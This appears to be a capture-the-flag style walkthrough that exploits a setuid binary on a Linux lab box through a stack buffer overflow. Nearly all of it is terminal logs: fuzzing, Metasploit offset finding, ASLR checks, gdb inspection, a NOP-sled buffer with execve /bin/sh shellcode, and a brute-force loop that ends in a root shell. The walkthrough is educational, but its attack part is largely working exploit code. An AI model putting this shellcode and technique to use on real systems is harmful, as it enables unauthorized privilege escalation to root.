Y Y \ ___/ | \ | | \/ \ ___/| | \/ /_/ | \__/\ / \___ >____/\___ >____/|__|_| /\___ > \___ / |__| |__|\___ >___| /\____ | \/ \/ \/ \/ \/ \/ \/ \/ \/ Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135 [email protected]:~$ ls Desktop Documents Downloads examples.desktop Music Pictures Public Templates Videos [email protected]:~$ cd ./ [email protected]:~$ cd / [email protected]:/$ ls bin boot cdrom dev etc home initrd.img lib lost+found media mnt opt proc root run sbin SECRET srv sys tmp usr var vmlinuz [email protected]:/$ cd SECRET [email protected]:/SECRET$ ls door1 door2 door3 [email protected]:/SECRET$ ls -lh total 12K drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door1 drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door2 drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door3 [email protected]:/SECRET$ cd door3 [email protected]:/SECRET/door3$ ls file [email protected]:/SECRET/door3$ ls -lh total 8.0K -rwsr-xr-x 1 root root 5.1K Sep 22 13:01 file [email protected]:/SECRET/door3$ ./file Syntax: ./file < input string>
BUFFER OVERFLOW FUZZING
[email protected]:/SECRET/door3$ ls file [email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x2048'` Segmentation fault (core dumped) [email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x200'` Segmentation fault (core dumped) [email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x150'` [email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x170'` [email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x171'` Illegal instruction (core dumped)
FINDING THE OFFSET
[email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 1024 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B [email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 41376641 [*] Exact match at offset 171 [email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 36664135 [*] Exact match at offset 167 [email protected]:~#
CHECKING FOR ASLR
[email protected]:/SECRET/door1$ ls file [email protected]:/SECRET/door1$ ldd file linux-gate.so.1 => (0xb77b9000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75f2000) /lib/ld-linux.so.2 (0xb77bb000) [email protected]:/SECRET/door1$ ldd file linux-gate.so.1 => (0xb7708000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7541000) /lib/ld-linux.so.2 (0xb770a000) [email protected]:/SECRET/door1$ ldd file linux-gate.so.1 => (0xb7740000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7579000) /lib/ld-linux.so.2 (0xb7742000) [email protected]:/SECRET/door1$ ldd file linux-gate.so.1 => (0xb773b000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7574000) /lib/ld-linux.so.2 (0xb773d000) [email protected]:/SECRET/door1$ ldd file linux-gate.so.1 => (0xb7783000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75bc000) /lib/ld-linux.so.2 (0xb7785000) [email protected]:/SECRET/door1$ ldd file linux-gate.so.1 => (0xb7764000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb759d000) /lib/ld-linux.so.2 (0xb7766000) [email protected]:/SECRET/door1$ [email protected]:/tmp$ cat test.c #include int main() { int a; printf("%p\n", &a); return 0; } [email protected]:/tmp$ ls exploit.poy exploit.py test.c [email protected]:/tmp$ gcc test.c -o test [email protected]:/tmp$ ./test 0xbfc0ad2c [email protected]:/tmp$ ./test 0xbfa93a1c [email protected]:/tmp$ ./test 0xbff82e3c
DEBUGGING
[email protected]:/SECRET/door3$ gdb -q ./file Reading symbols from ./file...(no debugging symbols found)...done. (gdb) r `perl -e 'print "A"x171, "B"x4, "C"x2000'` Starting program: /SECRET/door3/file `perl -e 'print "A"x171, "B"x4, "C"x2000'` Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) disass main Dump of assembler code for function main: 0x0804845d <+0>: push %ebp 0x0804845e <+1>: mov %esp,%ebp 0x08048460 <+3>: and $0xfffffff0,%esp 0x08048463 <+6>: sub $0xb0,%esp 0x08048469 <+12>: cmpl $0x1,0x8(%ebp) 0x0804846d <+16>: jg 0x8048490 <main+51> 0x0804846f <+18>: mov 0xc(%ebp),%eax 0x08048472 <+21>: mov (%eax),%eax 0x08048474 <+23>: mov %eax,0x4(%esp) 0x08048478 <+27>: movl $0x8048540,(%esp) 0x0804847f <+34>: call 0x8048310 <[email protected]> 0x08048484 <+39>: movl $0x0,(%esp) 0x0804848b <+46>: call 0x8048340 <[email protected]> 0x08048490 <+51>: mov 0xc(%ebp),%eax 0x08048493 <+54>: add $0x4,%eax 0x08048496 <+57>: mov (%eax),%eax 0x08048498 <+59>: mov %eax,0x4(%esp) 0x0804849c <+63>: lea 0x11(%esp),%eax 0x080484a0 <+67>: mov %eax,(%esp) 0x080484a3 <+70>: call 0x8048320 <[email protected]> 0x080484a8 <+75>: mov $0x0,%eax 0x080484ad <+80>: leave 0x080484ae <+81>: ret End of assembler dump. (gdb) info reg eax 0x0 0 ecx 0xbfe311f0 -1075637776 edx 0xbfe2fb28 -1075643608 ebx 0xb76e2000 -1217519616 esp 0xbfe2f360 0xbfe2f360 ebp 0x41414141 0x41414141 esi 0x0 0 edi 0x0 0 eip 0x42424242 0x42424242 eflags 0x10202 [ IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) </[email protected]></[email protected]></[email protected]></main+51>
FINDING A GOOD PLACE FOR OUR RETURN ADDRESS
(gdb) r `perl -e 'print "A"x171, "B"x4, "\x90"x4000'` (gdb) x/2500x $esp 0xbf92eaf0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eb00: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eb10: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eb20: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eb30: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eb40: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eb50: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eb60: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eb70: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eb80: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eb90: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eba0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ebb0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ebc0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ebd0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ebe0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ebf0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ec00: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ec10: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ec20: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ec30: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ec40: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ec50: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ec60: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ec70: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ec80: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ec90: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92eca0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ecb0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ecc0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ecd0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ece0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ecf0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ed00: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ed10: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ed20: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ed30: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ed40: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ed50: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ed60: 0x90909090 0x90909090 0x90909090 0x90909090 0xbf92ed70: 0x90909090 0x90909090 0x90909090 0x90909090
CONSTRUCTING OUR BUFFER
JUMP ADDRESS = 0xbf92eb80 LITTLE ENDIAN = \x80\xeb\x92\xbf OFFSET = 171 JMP = \x80\xeb\x92\xbf NOOP = \x90*2000 SHELLCODE = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80 BUFFER = OFFSET + JMP + NOOP + SHELLCODE
EXPLOITATION
[email protected]:/SECRET/door3$ for a in {1..1000}; do ./file `perl -e 'print "A"x171, "\x80\xeb\x92\xbf", "\x90"x2000', "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"`; done;Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) # whoami root
Questions? Comments? Send to @CrowdShield on Twitter.. l8rz!